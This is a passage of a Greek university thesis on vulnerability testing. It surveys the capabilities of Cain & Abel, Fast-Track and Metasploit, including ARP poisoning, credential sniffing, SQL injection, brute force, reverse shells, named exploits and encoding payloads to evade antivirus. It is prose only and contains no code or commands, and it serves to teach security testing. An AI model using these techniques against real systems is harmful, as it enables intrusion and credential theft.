
Εδώ μπορεί να ρυθμιστεί η κάρτα δικτύου που θα χρησιμοποιηθεί για τις sniffer και ARP

λειτουργίες του προγράμματος.

APR Tab

Εδώ γίνονται οι απαραίτητες ρυθμίσεις για τη λειτουργία APR (Arp Poison Routing).

Filters and Ports Tab

Ενεργοποιούνται ή απενεργοποιούνται τα φίλτρα sniffer του Cain και των θυρών για τις

εφαρμογές που χρησιμοποιούν τα πρωτόκολλα TCP/UDP. Επίσης εδώ μπορεί να

ενεργοποιηθεί η να απενεργοποιηθεί η ανάλυση των πρωτοκόλλων δρομολόγησης (HSRP,

VRRP, EIGRP, OSPF, RIPv1, RIPv2) και της λειτουργίας APR-DNS η οποία

συμπεριφέρεται σαν DNS Reply Rewriter.

HTTP Fields Tab

Αυτή η ετικέτα περιέχει μια λίστα με ονόματα χρηστών και πεδία συνθηματικών τα οποία θα

χρησιμοποιηθούν από το φίλτρο HTTP sniffer. Cookies and HTML Forms τα οποία

κυκλοφορούν μέσα σε πακέτα HTTP εξετάζονται ως εξής: για κάθε πεδίο του ονόματος

χρήστη τσεκάρονται όλα τα πεδία των συνθηματικών και αν βρεθούν αυτές οι δύο

παράμετροι τα πιστοποιητικά συλλαμβάνονται και εμφανίζονται στην οθόνη.

Traceroute Tab

Page 130: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

130 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

Εδώ γίνεται η ρύθμιση του ICMP/UDP/TCP traceroute του Cain. Μπορεί να ρυθμιστεί έτσι

ώστε να ανακτούνται ονόματα κόμβων, να χρησιμοποιείται για ανακάλυψη ICMP Mask και

να ενεργοποιηθεί ή να απενεργοποιηθεί η λήψη πληροφοριών WHOIS από κάθε hop.

Challenge Spoofing Tab

Εδώ ρυθμίζονται οι προσαρμοσμένες τιμές αναγνωριστικού (custom challenge value ) για

την επανεγγραφή μέσα στα πακέτα αυθεντικοποίησης NTLM. Αυτή η λειτουργία μπορεί να

ενεργοποιηθεί γρήγορα και από την μπάρα εργαλείων του Cain και πρέπει να

χρησιμοποιείται με το APR.

Το Abel είναι το δεύτερο τμήμα της εφαρμογής. Είναι σχεδιασμένο σαν μια υπηρεσία

Windows NT και αποτελείται από δύο αρχεία το"Abel.exe" και το "Abel.dll". Το πρώτο

είναι η κύρια εκτελέσιμη υπηρεσία του προγράμματος και το δεύτερο είναι η βιβλιοθήκη

που περιέχει τις απαραίτητες συναρτήσεις. Αν και το Cain είναι το κύριο front-end του Abel,

δεν είναι απαραίτητο να εγκατασταθεί για να δουλέψει το Abel. Η υπηρεσία Abel μπορεί να

εγκατασταθεί τοπικά ή απομακρυσμένα (μέσω του Cain) και απαιτεί δικαιώματα διαχειριστή

στο μηχάνημα στόχο.

Εικόνα 4.7: Οθόνη επιτυχούς εγκατάστασης του Abel

Μέσα από το φιλικό προς το χρήστη περιβάλλον μπορεί να επιλεγεί η λειτουργία που είναι

επιθυμητό να εκτελεστεί με το Cain και να οριστούν οι επιμέρους παράμετροι.

Για περισσότερες λεπτομέρειες ο αναγνώστης παραπέμπεται στο εγχειρίδιο λειτουργίας του

εργαλείου.

Page 131: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

131 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

4.5 Fast-Track

4.5.1 Ταυτότητα

Το Fast-Track είναι ένα αυτοματοποιημένο, ανοιχτού κώδικα εργαλείο που δημιουργήθηκε

για τη διευκόλυνση των ελεγκτών τρωτότητας. Είναι γραμμένο σε γλώσσα Python και είναι

δωρεάν διαθέσιμο στη διανομή BackTrack 4. Αποτελεί μια συλλογή από επιμέρους

εργαλεία, όπως το Nmap, το Metasploit, κ.α. Επιπλέον περιέχει exploits για MSSQL servers,

SQL Injection tools, metasploit Autopwn Automation, Mass Client Side attacks, αλλά και

γεννήτριες Payload. Τα εργαλεία αυτά είναι απαραίτητα σε ένα ελεγκτή τρωτότητας, για τον

εντοπισμό ευπαθειών σε ένα σύστημα και την εκμετάλλευση αυτών. Ο στόχος της χρήσης

ενός τέτοιου εργαλείου είναι ο εντοπισμός ευπαθειών και η έγκαιρη αντιμετώπισή τους.

Το Fast-Track λειτουργεί μόνο σε Linux περιβάλλοντα και είναι συμβατό με τις εξής

διανομές: Slackware, Debian, Ubuntu, Back-Track 3, Back|Track 4, Gentoo, FreeBSD,

OpenBSD, OSX, RedHat.

Επιπλέον, το Fast-Track έχει άμεση εξάρτηση με τις εφαρμογές : Metasploit 3, SQLite,

PYMSSQL, FreeTDS, Pexpect, ClientForms, Beautiful Soup, Psycho.

4.5.2 Δυνατότητες

Οι δυνατότητες του Fast-Track μπορούν να συνοψιστούν στα παρακάτω:

• Ταχύτητα και ευελιξία: Δεδομένου ότι το Fast-Track συνεργάζεται με άλλα εργαλεία

όπως τα Nmap, Metasploit, AirCrack-NG, Nikto, W3AF, SQLMap, Milw0rm, Nessus

κλπ, αυτοματοποιεί τη διαδικασία του penetration testing επιτρέποντας τον εντοπισμό

των ευπαθειών του πληροφοριακού συστήματος και την εκμετάλλευση αυτών εύκολα και

γρήγορα, χωρίς να απαιτείται η εκτέλεση πολλών διαφορετικών ελέγχων με κάθε

εργαλείο ξεχωριστά. Η δυνατότητα εισαγωγής αρχείων από άλλα εργαλεία όπως το

Nmap, το Nessus κλπ, παρέχει επιπλέον ευελιξία στο χρήστη.

• Αυτοματοποιημένη λειτουργία σάρωσης & εκμετάλλευσης: Μέσω της επιλογής Fast-

Track Metasploit Autopwnage γίνεται χρήση των εργαλείων Nmap και Metasploit.

Συγκεκριμένα, δοθείσης μιας διεύθυνσης IP ή μιας περιοχής διευθύνσεων ΙΡ

πραγματοποιείται σάρωση θυρών και εντοπισμός των υπηρεσιών που εκτελούνται σε

αυτές χρησιμοποιώντας το εργαλείο Nmap. Με την ολοκλήρωση της σάρωσης το

Metasploit εκτελεί τα exploits που αντιστοιχούν στην κάθε υπηρεσία. Σε περίπτωση που

Page 132: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

132 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

ο κόμβος είναι ευπαθής στα exploits, επιστρέφονται ένα ή περισσότερα απομακρυσμένα

διαδραστικά παράθυρα (shells).

• Πραγματοποίηση SQL επιθέσεων: Το Fast-Track διαθέτει μια συλλογή από εργαλεία

που επιτρέπουν την πραγματοποίηση SQL επιθέσεων σε ένα σύστημα στόχο.

Συγκεκριμένα οι επιθέσεις που μπορούν να πραγματοποιηθούν είναι:

o MSSQL Injector: Περιλαμβάνει τις παρακάτω επιθέσεις

1. SQL Injector - Query String Parameter Attack: Σε αυτή την επίθεση

δημιουργούνται διάφορα strings τα οποία μεταφέρονται και δοκιμάζονται μέσω

του φυλλομετρητή ιστού στην ιστοσελίδα στην οποία επιχειρείται η εκμετάλλευση

των ευπαθειών της. Η επιτυχία αυτής επίθεσης επιτρέπει μεταφορά εκτελέσιμου

κώδικα.

2. SQL Injector - POST Parameter Attack: Επιτρέπει την επίθεση σε όλες τις φόρμες

μιας συγκεκριμένης ιστοσελίδας (website) χωρίς να είναι απαραίτητος ο

προσδιορισμός οποιασδήποτε παραμέτρου. Με την απλή πληκτρολόγηση ενός

URL το Fast-Track θα πραγματοποιήσει αυτόματο SQL injection σε κάθε

παράμετρο.

3. SQL Injector - GET FTP Payload Attack: Αυτή η επίθεση δημιουργεί αυτόματα

έναν FTP server και έναν λογαριασμό χρήστη, τοποθετεί το netcat στον κατάλογο

home του απομακρυσμένου εξυπηρετητή, πραγματοποιεί SQL injection,

αντιστρέφει το ftp netcat του συστήματος, τερματίζει τον FTP server, διαγράφει το

λογαριασμό χρήστη που δημιούργησε και παρέχει ένα ανάστροφο shell στο

σύστημα που έχει επηρεάσει.

4. SQL Injector - GET Manual Setup Binary Payload Attack: Επιτρέπει εκτέλεση

προσαρμοσμένων επιθέσεων.

o MSSQL Bruter: Πραγματοποιούνται επιθέσεις εξαντλητικής αναζήτησης που

εντοπίζουν αδύναμα συνθηματικά σε SQL συστήματα. Οι διαθέσιμες επιλογές είναι:

attempt SQL Ping and Auto Quick Brute Force: γίνεται SQL Ping και αυτόματη

επίθεση εξαντλητικής αναζήτησης

mass scan and dictionary brute: μαζική σάρωση και επίθεση με χρήση λεξικού

(s)ingle Target: Πραγματοποιείται επίθεση σε ένα μεμονωμένο στόχο με ένα

μεγάλο λεξικό

find SQL Ports: γίνεται SQL Ping για την αναζήτηση SQL θυρών

i: ανοίγει ένα command prompt που επιτρέπει την πραγματοποίηση μη

αυτοματοποιημένων επιθέσεων σε ένα σύστημα που είναι γνωστό ότι διαθέτει

ευπάθειες.

vulnerable system: Επιτρέπει την προσθήκη ενός τοπικού διαχειριστή

Page 133: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

133 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

raw SQL: Εκτέλεση εντολών στον SQL Server

enable xp_cmdshell: Η επιτυχημένη εκτέλεση της επίθεσης επιστρέφει ένα shell

που μπορεί να επιτρέψει στον επιτιθέμενο να αποκτήσει δικαιώματα διαχειριστή

στη βάση δεδομένων

o SQLPwnage: Το εργαλείο SQLPwnage, εντοπίζει SQL injections σε μια ιστοσελίδα

την οποία δέχεται σαν όρισμα, πραγματοποιεί σάρωση σε μια περιοχή υποδικτύου για

τον εντοπισμό web servers και αναζητά πληροφορίες σε ιστοσελίδες. Σκοπός είναι η

επιστροφή ενός τερματικού στο χρήστη του, που θα του επιτρέψει να εκτελέσει

διάφορες ενέργειες στο απομακρυσμένο σύστημα. Οι επιλογές εκτέλεσης του

εργαλείου είναι οι εξής:

SQL Injection Search/Exploit by Binary Payload Injection (BLIND): ελέγχει όλους

τους δυνατούς τρόπους για SQL injection, π.χ. δοκιμάζοντας SQL injection σε

όλες τις φόρμες μιας ιστοσελίδας. Διαθέτει δύο επιλογές:

1. Spider σε ένα μεμονωμένο URL επιχειρώντας τυφλή εκμετάλλευση των

ευπαθειών της SQL

2. Σάρωση ενός υποδικτύου αναζητώντας web servers που εκτελούνται στη θύρα

80.

SQL Injection Search/Exploit by Binary Payload Injection (ERROR BASED):

χρησιμοποιεί τα μηνύματα λάθους που επιστρέφει η SQL σε κάθε προσπάθεια για

να επιτύχει το injection. Παρέχει δύο επιλογές:

1. Spider σε ένα μεμονωμένο URL αναζητώντας SQL Injection. Εάν εντοπιστούν

SQL Injection παρέχει την επιλογή εκμετάλλευσής τους

2. Σάρωση ενός υποδικτύου αναζητώντας web servers που τρέχουν στη θύρα 80.

SQL Injection single URL exploitation: Σε αντίθεση με τις δυο προηγούμενες

επιλογές όπου οι έλεγχοι πραγματοποιούνται σε ολόκληρα δίκτυα από web servers

αυτή η μέθοδος πραγματοποιεί SQL injections σε μια μόνο ιστοσελίδα,.

• Mass Client-Side Attack: Με αυτόν τον τύπο επίθεσης ο χρήστης του Fast Track

προσπαθεί να πείσει κάποιον χρήστη του συστήματος στόχου να συνδεθεί σε μια

εικονική ιστοσελίδα και εκμεταλλευόμενος αυτή τη σύνδεση να αποκτήσει πρόσβαση

στο σύστημά του.

• Exploits: Το Fast Track διαθέτει κάποια exploits τα οποία δεν περιέχονται στο

Metasploit. Η προσπάθεια που καταβάλλεται από τους δημιουργός του είναι να

εμπλουτίζεται συνεχώς αυτός ο κατάλογος με νέα επικαιροποιημένα exploits. Τα

διαθέσιμα exploits στην τρέχουσα έκδοση είναι:

o HP Openview Network Node Manager CGI Buffer Overflow (Universal)

o IBM Tivoli Storage Manager Express CAD Service Buffer Overflow (Universal)

Page 134: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

134 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

o HP Openview NNM 7.5.1 OVAS.EXE Pre Authentication SEH Overflow (Universal)

o Quicktime 7.3 RTSP SEH Overflow (Universal)

o Goodtech 6.4 Remote Buffer Overflow (Universal)

o MS08-067 Windows Server Service Code Execution Exploit (Win2k, Win2k3(SP2)

o mIRC 6.34 Remote Buffer Overflow Exploit (xpsp3, vista)

o TFTP Server for Windows V1.4 ST (vista)

o Internet Explorer XML Corruption Heap Spray (Universal)

o MS IE 7 Memory Corruption Exploit (MS09-002) (Universal)

o MS Internet Explorer 7 DirectShow (MS09-028) Heap Spray (Universal)

o FireFox 3.5 Heap Spray Exploit (Universal)

• Binary to Hex Payload Converter: Το Binary to Hex conversion μετατρέπει ένα

εκτελέσιμο σε ένα συγκεκριμένο δεκαεξαδικό σχήμα και στη συνέχεια πραγματοποιεί τη

μετατροπή των payloads από το δεκαεξαδικό πάλι σε δυαδικό. Με αυτό τον τρόπο μπορεί

να πραγματοποιηθεί η εκτέλεση κώδικα στο σύστημα στόχο.

• Payload Generator: Χρησιμοποιεί τη γεννήτρια Payload του Metasploit η οποία είναι

ένα απλό εργαλείο για τη δημιουργία payloads και listener στο framework του

Metasploit. Σημαντικό είναι ότι τα payloads κρυπτογραφούνται με αποτέλεσμα να

διέρχονται από τα περισσότερα Anti-Virus και IDS/IPS συστήματα χωρίς να

ανιχνεύονται.

• Ενημερώσεις: Το Fast-Track παρέχει τη δυνατότητα ενημέρωσης τόσο του ίδιου, όσο

και των εργαλείων με τα οποία συνεργάζεται, με τις νεώτερες εκδόσεις τους.

4.5.3 Περιορισμοί και παρενέργειες

Οι περιορισμοί και οι παρενέργειες που εντοπίζονται στο Fast-Track συνοψίζονται στα εξής:

• Επειδή το Fast-Track δεν μπορεί να προσδιορίσει την έκδοση των υπηρεσιών που

εκτελούνται στις θύρες του κόμβου στόχου, όταν εντοπίσει ενεργές θύρες και

προσδιορίσει τις υπηρεσίες που εκτελούνται σε αυτές, θα εκτελέσει για κάθε υπηρεσία

όλα τα διαθέσιμα exploits. Αυτό μπορεί να προκαλέσει κατάρρευση του συστήματος.

Επομένως, αφού δεν υπάρχει η δυνατότητα ρύθμισης του κάθε exploit και ο ορισμός του

αντίστοιχου payload προτείνεται η επιλογή συγκεκριμένων θυρών του στόχου για την

πραγματοποίηση των ελέγχων.

• Το εργαλείο SQLPwnage είναι σε beta μορφή και ακόμη αντιμετωπίζει προβλήματα ενώ

είναι αρκετά αργό στην εκτέλεση του.

Page 135: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

135 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

• Για την πραγματοποίηση της Mass Client-Side Attack θα πρέπει να βρεθεί τρόπος να

πειστεί ο χρήστης του συστήματος να συνδεθεί με την μη έγκυρη ιστοσελίδα.

Διαφορετικά δεν μπορεί να χρησιμοποιηθεί αυτός ο τύπος επίθεσης

• Στη μέθοδο Binary to Hex Payload υπάρχει ο περιορισμός του ότι το payload

πρέπει να είναι κάτω από 64KB. Στις περισσότερες περιπτώσεις αυτό ικανοποιείται.

Ωστόσο, κάποια payloads μπορούν να τείνουν να είναι αρκετά μεγάλα.

• Λειτουργεί μόνο σε Linux περιβάλλοντα.

4.5.4 Αρχιτεκτονική και τρόπος λειτουργίας

Όπως έχει ήδη αναφερθεί το Fast-Track είναι γραμμένο σε γλώσσα Python. Μπορεί να

χρησιμοποιηθεί, να εγκατασταθεί και να λειτουργήσει μόνο σε περιβάλλον Linux. Ο πιο

δημοφιλής τρόπος χρήσης του είναι είτε μέσω του εργαλείου – λειτουργικού συστήματος

Back-Track, είτε μέσα από VMWare image, είτε μέσα από Live CD. Σε περιβάλλον Linux

μπορεί να εγκατασταθεί απ’ ευθείας, προϋποθέτει όμως την εγκατάσταση και όλων των

επιμέρους εργαλείων με τα οποία συνεργάζεται: Metasploit 3, SQLite, PYMSSQL,

FreeTDS, Pexpect, ClientForms, Beautiful Soup, Psycho.

Το Fast-Track μπορεί να εκτελεστεί τόσο σε γραφικό περιβάλλον με χρήση ενός

φυλλομετρητή (Web Browser), όπου στη γραμμή διευθύνσεων πληκτρολογείται η διεύθυνση

http://127.0.0.1:44444, είτε μέσω της γραμμής εντολών. Εκτελώντας το Fast-Track, μέσα

από το menu του BackTrack Penetration Fast Track, έχουμε την

επιλογή να το εκκινήσουμε είτε με το menu που προσφέρεται μέσα από τη γραμμή εντολών,

είτε με το γραφικό περιβάλλον που προσφέρεται μέσα από οποιονδήποτε browser, είτε με τη

χρήση εντολών, εκτελώντας μεμονωμένα κάθε επιμέρους εργαλείο.

Page 136: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

136 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

Εικόνα 4.8: Η κονσόλα επιλογών του Fast-Track

Εικόνα 4.9: Η γραφική κονσόλα του Fast-Track

Η επιλογή εκτέλεσης σε web browser μας δίνει τη δυνατότητα με λίγα κλικ να εκτελέσουμε

την επιθυμητή ενέργεια επιλέγοντας την από την αριστερή στήλη και συμπληρώνοντας τα

αντίστοιχα πεδία (πχ. διεύθυνση ΙΡ).

Page 137: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

137 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

Όποιο περιβάλλον εργασίας και να επιλεγεί παρέχονται οδηγίες και επεξηγήσεις που κάνουν

τη χρήση τόσο εύκολη ακόμα και για αρχάριους χρήστες.

Page 138: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

138 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

4.6 Metasploit

4.6.1 Ταυτότητα

Το Metasploit Framework – MSF είναι ένα εργαλείο ανοιχτού κώδικα, με το οποίο οι

επαγγελματίες ασφάλειας διενεργούν ελέγχους τρωτότητας (Penetration testing), ανάπτυξη

shellcode και αναζήτηση ευπαθειών. Χρησιμοποιείται για την συγγραφή, τον έλεγχο και τη

χρήση κώδικα ο οποίος εκμεταλλεύεται τις ευπάθειες των συστημάτων (exploit code). Είναι

διαθέσιμο μέσω της ιστοσελίδας http://www.metasploit.com/.

Το MetaSploit Framework παρέχει μια ολοκληρωμένη υποδομή ανάπτυξης και διαχείρισης

exploits, payloads, NOP (No OPeration) γεννητριών, βιβλιοθηκών πρωτοκόλλων, ρουτινών

κωδικοποίησης ενώ ταυτόχρονα μπορεί να συνεργαστεί με άλλα εργαλεία για τον εντοπισμό

ευπαθειών σε ένα πληροφορικό σύστημα. Μπορεί να εκτελεστεί σε γραμμή εντολών

επιλέγοντας msfcli ή msfconsole. Εναλλακτικά ο msfweb web server επιτρέπει στον χρήστη

να έχει πρόσβαση στην MSF πλατφόρμα και στις λειτουργίες της μέσω ενός απλού

φυλλομετρητή ιστοσελίδων. Επιπλέον, μετά την έκδοση 3.1 το εργαλείο διαθέτει το γραφικό

περιβάλλον msfgui. Το MSF γράφτηκε αρχικά σε αντικειμενοστραφή Perl ενώ αργότερα σε

Ruby, C, C++, και assembler γεγονός που το καθιστά απόλυτα συμβατό τόσο σε Windows,

όσο και σε Unix based συστήματα, συμπεριλαμβανομένων του Linux, Mac OS X και πλήθος

λειτουργικών συστημάτων.

Το εργαλείο συνεργάζεται σχεδόν με όλα τα λειτουργικά συστήματα που βασίζονται στο

Unix και τα οποία περιέχουν την πλέον πρόσφατη έκδοση του Ruby interpreter (1.9.1). Κάθε

έκδοση του MSF έχει ελεγχθεί και συνεργάζεται με τις τρεις (3) κύριες πλατφόρμες:

• Linux 2.6 (x86, ppc)

• Windows NT (2000, XP, 2003, Vista, Windows 7)

• MacOS X 10.5 (x86, ppc)

Ο χρήστης μπορεί να ενημερωθεί για τις τελευταίες εξελίξεις του εργαλείου μέσω της

ιστοσελίδας http://metasploit.com.

To MSF είναι μια πλατφόρμα για πραγματοποίηση επιθέσεων. Επιτρέπει στον χρήστη να

εξαπολύει επιθέσεις έναντι συγκεκριμένων και σαφώς προσδιορισμένων στόχων που μπορεί

να έχουν προηγουμένως εντοπιστεί με ένα λογισμικό ανίχνευσης ευπαθειών όπως το Nessus.

Σκοπός είναι να πραγματοποιηθεί η εκμετάλλευση μιας ευπάθειας, εκτελώντας επιθυμητά

Page 139: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

139 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

από τον χρήστη exploits (κώδικα που εκμεταλλεύεται κάποιο σφάλμα του συστήματος) τα

οποία μπορεί ο ίδιος να διαλέξει, να παραμετροποιήσει, ακόμα και να συντάξει.

Στην τρέχουσα έκδοση του 3.3.3 το MSF περιέχει 463 exploit modules και 219 auxiliary

modules.

4.6.2 Δυνατότητες

Οι βασικές δυνατότητες του MSF μπορούν να συνοψιστούν στα παρακάτω:

• Η κύρια δυνατότητα του MSF έγκειται στο ότι οι χρήστες μπορούν να γράψουν εύκολα

τα δικά τους exploits. Αυτό οφείλεται στη διαθεσιμότητα των περισσότερων payloads,

των γεννητριών NOP και των encoders τα οποία επιτρέπουν αφενός την εύκολη

ανάπτυξη νέων exploits, αφετέρου τη χρήση των ήδη υπαρχόντων για τη διενέργεια

ελέγχων σε διαφορετικές πλατφόρμες. Αυτό είναι πολύ σημαντικό για τους διαχειριστές

συστημάτων. Μέχρι πρόσφατα, η ανάπτυξη των exploits έχει περιοριστεί σε μια μικρή

ομάδα ανθρώπων, τους ερευνητές και τους επαγγελματίες ελεγκτές ασφάλειας. Ένας

διαχειριστής δεν είχε συνήθως κανέναν τρόπο να γνωρίζει αν τα συστήματα του ήταν

ευπαθή στις πιο πρόσφατες απειλές. Με το MSF, ο διαχειριστής του συστήματος μπορεί

να ελέγξει το πληροφοριακό σύστημα, τόσο ως προς την ευπάθειά του σε έναν δεδομένο

exploit, όσο και κατά πόσο είναι πράγματι ευπαθές, εκτελώντας το exploit.

• Το MSF μπορεί να χρησιμοποιηθεί ως πλατφόρμα για τη δημιουργία νέων και

ισχυρότερων εργαλείων ελέγχου ασφάλειας. Η αρχιτεκτονική του framework επιτρέπει

στους ελεγκτές ασφάλειας να επεκτείνουν τη λειτουργία του framework και να

δημιουργήσουν νέα εργαλεία.

• Τα recon Modules επιτρέπουν τόσο τη διασύνδεση με άλλα εργαλεία ελέγχου ασφάλειας

όπως τα Nmap ή Nessus, όσο και την αντιγραφή της λειτουργίας τους. Επιπλέον μπορεί

να συνεργαστεί και με εμπορικές εφαρμογές. Τα APIs τα οποία παρέχονται από το

framework επιτρέπουν σε διάφορα plugins να κωδικοποιηθούν και να χρησιμοποιηθούν

αυτούσια από το framework.

• Παρέχει τη δυνατότητα πραγματοποίησης επιθέσεων έναντι συγκεκριμένων και σαφώς

προσδιορισμένων στόχων οι οποίοι μπορεί να έχουν προηγουμένως εντοπιστεί με τη

χρήση κάποιου άλλου λογισμικού ανίχνευσης ευπαθειών όπως το Nessus.

• Μετά από την επιτυχημένη εκμετάλλευση μιας ευπάθειας μπορούν να χρησιμοποιηθούν

διάφορα payloads για την πραγματοποίηση διαφόρων ενεργειών στο σύστημα στόχο.

Αυτό περιλαμβάνει ενέργειες όπως δημιουργία χρηστών στο σύστημα, εκτέλεση

συγκεκριμένων εντολών, απόκτηση διαχειριστικών δικαιωμάτων του στόχου, διείσδυση

Page 140: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

140 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

VNC DLL γεννητριών για επίτευξη απομακρυσμένης πρόσβασης με γραφικές

δυνατότητες (GUI), ακόμα και χρήση του εργαλείου Meterpreter. Ιδιαίτερα οι δύο

τελευταίες δυνατότητες DLL inject και Meterpreter είναι πολύ σημαντικές. Η VNC

διείσδυση είναι πολύ χρήσιμη αφού παρέχει εκτενή απομακρυσμένη πρόσβαση με

SYSTEM δικαιώματα πάνω στην εκτεθειμένη μηχανή. Επίσης εξαιρετικά χρήσιμο είναι

και το Metepreter το οποίο είναι εξειδικευμένο πολυχρηστικό Windows payload που

λαμβάνει δράση μετά (Meta-Interpreter) από μια επιτυχημένη εκμετάλλευση με τον πιο

αποτελεσματικό και διακριτικό τρόπο.

• Επίσης σημαντικό είναι το ότι το MSF φτάνει με ένα αρκετά μεγάλο αριθμό

προεγκατεστημένου κώδικα πολύ σημαντικών και χρήσιμων payloads, γεγονός που

διευκολύνει και βελτιώνει σημαντικά την ευελιξία στην κατάκτηση του στόχου.

• Τα payloads είναι σειρές assembly εντολών συχνά συνοδευόμενα από NOP sleds. Επειδή

όμως είναι πιθανό οι μηχανισμοί σύγκρισης και αναγνώρισης μοτίβων δικτυακής κίνησης

(signatures) να αναγνωρίζουν τέτοιες επιθέσεις, το MSF διαθέτει κωδικοποιητές,

(encoders) που σε συνδυασμό με την παραλλαγή των NOP sleds, αποτρέπουν τα IDS

